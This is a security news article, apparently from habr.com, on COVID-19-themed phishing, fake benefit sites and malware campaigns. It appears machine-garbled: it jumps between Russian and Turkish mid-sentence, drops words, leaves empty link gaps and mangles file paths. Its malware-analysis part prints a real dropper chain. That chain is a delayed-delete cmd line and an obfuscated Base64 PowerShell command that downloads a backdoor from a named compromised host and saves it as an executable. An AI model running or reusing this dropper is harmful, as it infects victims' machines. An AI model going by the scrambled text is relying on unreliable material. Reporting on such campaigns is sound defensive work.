Злоумышленники продолжают эксплуатировать тему COVID-19, создавая все новые и новые угрозы для пользователей, живо интересующихся всем, что касается эпидемии. В мы уже говорили о том, какие разновидности вредоносного ПО появились на волне коронавируса, а сегодня речь пойдет о приемах социальной инженерии, с которыми уже столкнулись пользователи в разных странах, а том числе и в России. Общие тенденции и примеры — под катом.
Hatırla мы говорили о том, что люди охотно читают не только о коронавирусе и течении эпидемии, но и о мерах финансовой поддержки? Вот наглядный пример. В немецком штате Северная Рейн-Вестфалия (North Rhine-Westphalia ил NRW) была обнаружена любопытная фишинговая атака. Злоумышленники создали копии сайта министерства экономики (), herkesin mali yardım için başvurabileceği yer. Böyle bir program aslında var ve dolandırıcılar için faydalı olduğu ortaya çıktı. Kurbanlarının kişisel bilgilerini aldıktan sonra bakanlığın internet sitesine başvuruda bulundular ancak diğer banka bilgilerini de belirttiler. Resmi verilere göre plan ortaya çıkana kadar 4 bin adet sahte talepte bulunuldu. Sonuç olarak, etkilenen vatandaşlara yönelik 109 milyon dolar dolandırıcıların eline geçti.
Ücretsiz COVİD-19 testi ister misiniz?
Coronavirüs temalı kimlik avının bir diğer önemli örneği ise şuydu: в электронных писмах. Сообщения привлекали внимание пользователей предложением пройти бесплатное тестирование на предмет заражения коронавирусом. Во вложении этих находились экземпляры Trickbot/Qakbot/Qbot. И когда желающие проверить свое здоровье приступали к “заполнению приложенной формы”, на компьютер загружался вредоносный скрипт. А чтобы избежать проверки методом сэндбоксинга, скрипт приступал к загрузке основного вируса лишь через некоторое время, когда системы защиты убеждались, что никакой вредоносной активности не проихсодит.
Убедить большинство пользователей в необходимости включить макросы тоже было несложно. Для этого применялся стандартный трюк, когда для заполнения анкеты нужно сначала разрешить макросы, а значит — запустить скрипт VBA.
Gördüğünüz gibi VBA betiği antivirüslerden özel olarak maskelenmiştir.
В Windows есть функция ожидания, когда приложение ждет /T <секунд>, прежде чем принять ответ “Да” по умолчанию. В нашем случае скрипт ждал 65 секунд, прежде чем удалить временные файлы:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
А в процессе ожидания происходила загрузка вредоносного ПО. Для этого был запущен специальный скрипт PowerShell:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
После декодирования значения Base64, скрипт PowerShell загружает бэкдор, находящийся на предварительно взломанном веб-сервере из Германии:
http://automatischer-staubsauger.com/feature/777777.pngve şu adla kaydeder:
C:UsersPublictmpdirfile1.exe
Dosya ‘C:UsersPublictmpdir’ komutu içeren 'tmps1.bat' dosyası çalıştırıldığında silinir cmd /c mkdir ""C:UsersPublictmpdir"".
Devlet kurumlarına yönelik hedefli saldırı
Кроме этого недавно аналитики FireEye сообщили о целевой атаке APT32, направленной на правительственные структуры Уханя, а также Министерство Неотложной Помощи Китая (Chinese Ministry of Emergency Management). В одном из распотраняемых RTF содержалась ссылка на статью из New York Times под названием . Однако при ее прочтении проихсодила загрузка вредоносного ПО (Аналитики FireEye идентифицировали экземпляр как METALJACK).
Интересно, что на момент обнаружения ни один из антивирусов не детектировал этот экземпляр согласно данным Virustotal.
Resmi web siteleri kapalı olduğunda
Kimlik avı saldırısının en çarpıcı örneği geçtiğimiz gün Rusya'da yaşandı. Bunun nedeni, 3 ila 16 yaş arası çocuklar için uzun zamandır beklenen bir yardımın atanmasıydı. 12 Mayıs 2020'de başvuruların kabul edilmeye başlandığı duyurulduğunda, milyonlarca kişi uzun zamandır beklenen yardım için Devlet Hizmetleri web sitesine akın etti ve portalın profesyonel bir DDoS saldırısından daha kötü bir şekilde çökertilmesine neden oldu. Başkan, "Devlet Hizmetlerinin başvuru akışını karşılayamadığını" söylediğinde insanlar, başvuruları kabul etmek için alternatif bir sitenin başlatılması hakkında internette konuşmaya başladı.
Проблема заключается в том, что сайтов заработало сразу несколько, и пока один, настоящий по адресу posobie16.gosuslugi.ru действительно принимает заявления, еще .
SearchInform'dan meslektaşlarımız .ru bölgesinde yaklaşık 30 yeni sahte alan adı buldu. Infosecurity ve Softline Company, Nisan ayının başından bu yana 70'ten fazla benzer sahte devlet hizmeti web sitesini takip etti. Yaratıcıları tanıdık sembolleri manipüle ediyor ve ayrıca gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie vb. kelimelerin kombinasyonlarını kullanıyor.
Heyecan ve sosyal mühendislik
Все эти примеры только подтверждают, что злоумышленники успешно монетизируют тематику коронавируса. И чем выше социальное напряжение и чем больше неясных вопросов, тем больше шансов у мошенников украсть важные данные, заставить людей самостоятельно отдать свои деньги или просто взломать побольше компьютеров.
Salgının potansiyel olarak hazırlıksız insanları toplu halde evden çalışmaya zorladığı göz önüne alındığında, yalnızca kişisel değil, kurumsal veriler de risk altında. Örneğin yakın zamanda Microsoft 365 (eski adıyla Office 365) kullanıcıları da bir kimlik avı saldırısına maruz kaldı. İnsanlar mektuplara ek olarak çok sayıda "cevapsız" sesli mesaj aldı. Ancak dosyalar aslında saldırının kurbanlarını e-posta adresine gönderen bir HTML sayfasıydı. . Sonuç olarak, hesaptaki tüm verilere erişim kaybı ve güvenliğin ihlali.
Kaynak: habr.com